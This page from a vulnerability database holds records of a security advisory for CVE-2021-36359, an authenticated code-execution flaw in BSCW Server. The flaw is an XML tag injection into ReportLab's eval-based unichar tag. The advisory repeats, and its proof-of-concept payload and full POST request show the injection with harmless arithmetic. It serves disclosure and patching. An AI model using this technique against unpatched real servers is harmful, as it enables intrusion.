BSCW Server XML Injection

2021-08-31T00:00:00

Description

{"id": "PACKETSTORM:163988", "type": "packetstorm", "bulletinFamily": "exploit", "title": "BSCW Server XML Injection", "description": "", "published": "2021-08-31T00:00:00", "modified": "2021-08-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163988/BSCW-Server-XML-Injection.html", "reporter": "Armin Stock", "references": [], "cvelist": ["CVE-2021-36359"], "immutableFields": [], "lastseen": "2021-08-31T21:43:05", "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-36359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36692"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-36359"]}, {"type": "zdt", "idList": ["1337DAY-ID-36692"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceHref": "https://packetstormsecurity.com/files/download/163988/SA-20210827-1.txt", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210827-1 > \n======================================================================= \ntitle: XML Tag injection \nproduct: BSCW Server \nvulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 \nfixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3 \nCVE number: CVE-2021-36359 \nimpact: high \nhomepage: https://www.bscw.de/classic/ \nfound: 2021-06-30 \nby: Armin Stock (Atos Germany) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"A versatile system for any field of application \n \nBSCW Classic is in use around the world. With more than 500 functions, it \noffers the right solution for every task. Turn your ideas into reality! Our \nproven system has been supporting information flow and knowledge management at \nnumerous companies for more than 20 years.\" \n \nSource: https://www.bscw.de/en/classic/ \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patched version for the affected products, which should \nbe installed immediately. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) XML Tag injection \nThe application allows a user with low privileges to export different objects \nto a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To \nexport the content of the objects the framework ReportLab is used. This library \nsupports different tags to export structured content: \n \n------------------------------------------------------------------------------- \n# File: reportlab/platypus/paraparser.py \n!!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! \nThe ParaFormatter will be able to format the following \ntags: \n - bold \n - italics \n - underline \nwidth and offset can be empty meaning use existing canvas line width \nor with an f/F suffix regarded as a fraction of the font size \n< strike > < /strike > - strike through has the same parameters as underline \n< super [size=\"pts\"] [rise=\"pts\"]> < /super > - superscript \n - superscript \n - subscript \n \n \n< bullet > </bullet> - bullet text (at head of para only) \n<onDraw name=callable label=\"a label\"/> \n<index [name=\"callablecanvasattribute\"] label=\"a label\"/> \n<link>link text</link> \nattributes of links \nsize/fontSize/uwidth/uoffset=num \nname/face/fontName=name \nfg/textColor/color/ucolor=color \nbackcolor/backColor/bgcolor=color \ndest/destination/target/href/link=target \nunderline=bool turn on underline \n<a>anchor text</a> \nattributes of anchors \nfontSize=num \nfontName=name \nfg/textColor/color=color \nbackcolor/backColor/bgcolor=color \nhref=href \n<a name=\"anchorpoint\"/> \n<unichar name=\"unicode character name\"/> \n<unichar value=\"unicode code point\"/> \n<img src=\"path\" width=\"1in\" height=\"1in\" valign=\"bottom\"/> \nwidth=\"w%\" --> fontSize*w/100 idea from Roberto Alsina \nheight=\"h%\" --> linewidth*h/100 <ralsina@netmanagers.com.ar> \n<greek> - </greek> \n ... turn off word breaking and hyphenation \n \nThe whole may be surrounded by <para> </para> tags \n------------------------------------------------------------------------------- \n \nThe application does not properly encode the user content before passing it to \n`ReportLab`, which allows the user to inject own tags. These tags get evaluated \nby the `ReportLab`. \n \nDepending on the version of `ReportLab` it allows the user to do a `SSRF` \n(server side request forgery) attack via the `img` tag \n(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145). \n \nThere are also known vulnerabilites in `ReportLab`: \n \n* https://www.cybersecurity-help.cz/vdb/SB2019101613 \n* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2 \n \nThis allows an attacker to execute `Python` code via the `unichar` tag or the \n`color` attribute. \n \n \nProof of concept: \n----------------- \n1) XML Tag injection \nOne possible injection point is the `description` of a folder. Using the \nfollowing payload allows the execution of the `Python` code `28+20`. \n \n<strike>hello</strike><unichar code=\"28+20\"/> \n \nThe result of this code is `48` (ASCII: `0`), which gets written to the \ngenerated `PDF` file. \n \n------------------------------------------------------------------------------- \nPOST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1 \n \nHost: bscw.local:8080 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 765 \nOrigin: http://bscw.local:8080 \nDNT: 1 \nConnection: keep-alive \nReferer: http://bscw.local:8080/sec/bscw.cgi/1917?op=editfolder.EditFolder&id=1917_2088&inside_dialog=1 \nCookie: MicroblogInboxIndicatorState=%5B1629367994%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; bscw_dummy_cookie=opensesame; bscw_auth=\"wsZjskopxMc1MSIVJq1bnn0fqKqLR9hB:108\"; _sec_bscws=\"45aa7a088a17c12646aaf10d670395cb:264\" \nUpgrade-Insecure-Requests: 1 \n \n \nop=editfolder.EditFolder&inside_dialog=1&bscw_v_post=cCzT8tEnZ1kR%2FnH6gC15aLTjerCLR9hB&id=1917_2088&_selected=editfolder.NameTagsDescrRate&_editfolder.NameTagsDescrRate_renameo.Chname_name=hello&_editfolder.NameTagsDescrRate_renameo.Chname_=3&_editfolder.NameTagsDescrRate_chtags.EditTags_tags=&_editfolder.NameTagsDescrRate_chtags.EditTags_=3&_editfolder.NameTagsDescrRate_chdescr.Chdescr_descr=<strike>hello</strike><unichar code=\"28+20\"/>&_editfolder.NameTagsDescrRate_chdescr.Chdescr_=3&_editfolder.NameTagsDescrRate_=3&_approval.approval_approval_choice=approval_inherited&_approval.approval_addactions=approval.approval.ApprovalTaskItem&_approval.approval_=3&_autovers_maxvers=inherit&_autovers_mvnr=&_autovers_=3&_=3&__ok_.x=+++OK+++ \n------------------------------------------------------------------------------- \n \nThe vulnerable code in the `ReportLab` framework: \n------------------------------------------------------------------------------- \n# File: reportlab\\platypus\\paraparser.py \ndef start_unichar(self, attr): \nif 'name' in attr: \nif 'code' in attr: \nself._syntax_error('<unichar/> invalid with both name and code attributes') \ntry: \nv = unicodedata.lookup(attr['name']) \nexcept KeyError: \nself._syntax_error('<unichar/> invalid name attribute\\n\"%s\"' % ascii(attr['name'])) \nv = '\\0' \nelif 'code' in attr: \ntry: \nv = int(eval(attr['code'])) \nv = chr(v) if isPy3 else unichr(v) \nexcept: \nself._syntax_error('<unichar/> invalid code attribute %s' % ascii(attr['code'])) \nv = '\\0' \n------------------------------------------------------------------------------- \nMost likely there are more injection points to include own tags, but no further \nactions were taken to find them. \n \n \nVulnerable / tested versions: \n----------------------------- \nBSCW Classic 5.2.3 has been used to identify the vulnerability. \n \nThe vendor confirmed the following versions to be also affected by the \nvulnerability: \nBSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 \n \n \nVendor contact timeline: \n------------------------ \n2021-07-31: Sent report to vendor. \n2021-08-01: Vendor confirmed the issue and is working on a patch. \n2021-08-19: Vendor notified licensed customers about the issue and a patch. \n2021-08-27: Coordinated release of security advisory. \n \n \nSolution: \n--------- \nThe vendor provides a patched version for the affected and supported products, \nwhich should be installed immediately. \n \nAdditional information can be viewed at the vendor's support page. \n \n \nWorkaround: \n----------- \nEnsure the the used `ReportLab` version is >= `3.5.55` to mitigiate an active \nexploit of these known vulnerabilites. \nIt is also possbile to disable the `Export to PDF` function. This should be the \npreferred way, until the vendor provides a patch. \n \n$ bin/bsadmin package -d exportpdf \n \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Armin Stock / @2021 \n \n`\n", "_state": {"dependencies": 1645947128}}

{"zdt": [{"lastseen": "2021-12-04T15:51:15", "description": "BSCW Server versions 7.4.2 and below, 7.3.2 and below, 5.2.3 and below, 5.1.9 and below, and 5.0.11 and below suffer from an XML tag injection vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "zdt", "title": "BSCW Server XML Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36359"], "modified": "2021-08-31T00:00:00", "id": "1337DAY-ID-36692", "href": "https://0day.today/exploit/description/36692", "sourceData": "=======================================================================\n title: XML Tag injection\n product: BSCW Server\n vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2\n fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3\n CVE number: CVE-2021-36359\n impact: high\n homepage: https://www.bscw.de/classic/\n found: 2021-06-30\n by: Armin Stock (Atos Germany)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"A versatile system for any field of application\n\nBSCW Classic is in use around the world. With more than 500 functions, it\noffers the right solution for every task. Turn your ideas into reality! Our\nproven system has been supporting information flow and knowledge management at\nnumerous companies for more than 20 years.\"\n\nSource: https://www.bscw.de/en/classic/\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patched version for the affected products, which should\nbe installed immediately.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) XML Tag injection\nThe application allows a user with low privileges to export different objects\nto a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To\nexport the content of the objects the framework ReportLab is used. This library\nsupports different tags to export structured content:\n\n-------------------------------------------------------------------------------\n# File: reportlab/platypus/paraparser.py\n !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!\n The ParaFormatter will be able to format the following\n tags:\n - bold\n - italics\n - underline\n width and offset can be empty meaning use existing canvas line width\n or with an f/F suffix regarded as a fraction of the font size\n < strike > < /strike > - strike through has the same parameters as underline\n < super [size=\"pts\"] [rise=\"pts\"]> < /super > - superscript\n - superscript\n - subscript\n \n \n < bullet > </bullet> - bullet text (at head of para only)\n <onDraw name=callable label=\"a label\"/>\n <index [name=\"callablecanvasattribute\"] label=\"a label\"/>\n <link>link text</link>\n attributes of links\n size/fontSize/uwidth/uoffset=num\n name/face/fontName=name\n fg/textColor/color/ucolor=color\n backcolor/backColor/bgcolor=color\n dest/destination/target/href/link=target\n underline=bool turn on underline\n <a>anchor text</a>\n attributes of anchors\n fontSize=num\n fontName=name\n fg/textColor/color=color\n backcolor/backColor/bgcolor=color\n href=href\n <a name=\"anchorpoint\"/>\n <unichar name=\"unicode character name\"/>\n <unichar value=\"unicode code point\"/>\n <img src=\"path\" width=\"1in\" height=\"1in\" valign=\"bottom\"/>\n width=\"w%\" --> fontSize*w/100 idea from Roberto Alsina\n height=\"h%\" --> linewidth*h/100 <[email\u00a0protected]>\n <greek> - </greek>\n ... turn off word breaking and hyphenation\n\n The whole may be surrounded by <para> </para> tags\n-------------------------------------------------------------------------------\n\nThe application does not properly encode the user content before passing it to\n`ReportLab`, which allows the user to inject own tags. These tags get evaluated\nby the `ReportLab`.\n\nDepending on the version of `ReportLab` it allows the user to do a `SSRF`\n(server side request forgery) attack via the `img` tag\n(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145).\n\nThere are also known vulnerabilites in `ReportLab`:\n\n* https://www.cybersecurity-help.cz/vdb/SB2019101613\n* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2\n\nThis allows an attacker to execute `Python` code via the `unichar` tag or the\n`color` attribute.\n\n\nProof of concept:\n-----------------\n1) XML Tag injection\nOne possible injection point is the `description` of a folder. Using the\nfollowing payload allows the execution of the `Python` code `28+20`.\n\n<strike>hello</strike><unichar code=\"28+20\"/>\n\nThe result of this code is `48` (ASCII: `0`), which gets written to the\ngenerated `PDF` file.\n\n-------------------------------------------------------------------------------\nPOST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1\n\nHost: bscw.local:8080\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 765\nOrigin: http://bscw.local:8080\nDNT: 1\nConnection: keep-alive\nReferer: http://bscw.local:8080/sec/bscw.cgi/1917?op=editfolder.EditFolder&id=1917_2088&inside_dialog=1\nCookie: MicroblogInboxIndicatorState=%5B1629367994%2C0%5D; MicroblogSlidingPanelDisplayState=%22hidden%22; bscw_dummy_cookie=opensesame; bscw_auth=\"wsZjskopxMc1MSIVJq1bnn0fqKqLR9hB:108\"; _sec_bscws=\"45aa7a088a17c12646aaf10d670395cb:264\"\nUpgrade-Insecure-Requests: 1\n\n\nop=editfolder.EditFolder&inside_dialog=1&bscw_v_post=cCzT8tEnZ1kR%2FnH6gC15aLTjerCLR9hB&id=1917_2088&_selected=editfolder.NameTagsDescrRate&_editfolder.NameTagsDescrRate_renameo.Chname_name=hello&_editfolder.NameTagsDescrRate_renameo.Chname_=3&_editfolder.NameTagsDescrRate_chtags.EditTags_tags=&_editfolder.NameTagsDescrRate_chtags.EditTags_=3&_editfolder.NameTagsDescrRate_chdescr.Chdescr_descr=<strike>hello</strike><unichar code=\"28+20\"/>&_editfolder.NameTagsDescrRate_chdescr.Chdescr_=3&_editfolder.NameTagsDescrRate_=3&_approval.approval_approval_choice=approval_inherited&_approval.approval_addactions=approval.approval.ApprovalTaskItem&_approval.approval_=3&_autovers_maxvers=inherit&_autovers_mvnr=&_autovers_=3&_=3&__ok_.x=+++OK+++\n-------------------------------------------------------------------------------\n\nThe vulnerable code in the `ReportLab` framework:\n-------------------------------------------------------------------------------\n# File: reportlab\\platypus\\paraparser.py\ndef start_unichar(self, attr):\n if 'name' in attr:\n if 'code' in attr:\n self._syntax_error('<unichar/> invalid with both name and code attributes')\n try:\n v = unicodedata.lookup(attr['name'])\n except KeyError:\n self._syntax_error('<unichar/> invalid name attribute\\n\"%s\"' % ascii(attr['name']))\n v = '\\0'\n elif 'code' in attr:\n try:\n v = int(eval(attr['code']))\n v = chr(v) if isPy3 else unichr(v)\n except:\n self._syntax_error('<unichar/> invalid code attribute %s' % ascii(attr['code']))\n v = '\\0'\n-------------------------------------------------------------------------------\nMost likely there are more injection points to include own tags, but no further\nactions were taken to find them.\n\n\nVulnerable / tested versions:\n-----------------------------\nBSCW Classic 5.2.3 has been used to identify the vulnerability.\n\nThe vendor confirmed the following versions to be also affected by the\nvulnerability:\nBSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2\n\n\nVendor contact timeline:\n------------------------\n2021-07-31: Sent report to vendor.\n2021-08-01: Vendor confirmed the issue and is working on a patch.\n2021-08-19: Vendor notified licensed customers about the issue and a patch.\n2021-08-27: Coordinated release of security advisory.\n\n\nSolution:\n---------\nThe vendor provides a patched version for the affected and supported products,\nwhich should be installed immediately.\n\nAdditional information can be viewed at the vendor's support page.\n\n\nWorkaround:\n-----------\nEnsure the the used `ReportLab` version is >= `3.5.55` to mitigiate an active\nexploit of these known vulnerabilites.\nIt is also possbile to disable the `Export to PDF` function. This should be the\npreferred way, until the vendor provides a patch.\n\n$ bin/bsadmin package -d exportpdf\n", "sourceHref": "https://0day.today/exploit/36692", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:52:03", "description": "OrbiTeam BSCW Classic before 7.4.3 allows exportpdf authenticated remote code execution (RCE) via XML tag injection because reportlab\\platypus\\paraparser.py (reached via bscw.cgi op=_editfolder.EditFolder) calls eval on attacker-supplied Python code. This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T05:15:00", "type": "cve", "title": "CVE-2021-36359", "cwe": ["CWE-91"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36359"], "modified": "2021-09-01T20:14:00", "cpe": [], "id": "CVE-2021-36359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36359", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}]}

BSCW Server XML Injection

Description

Related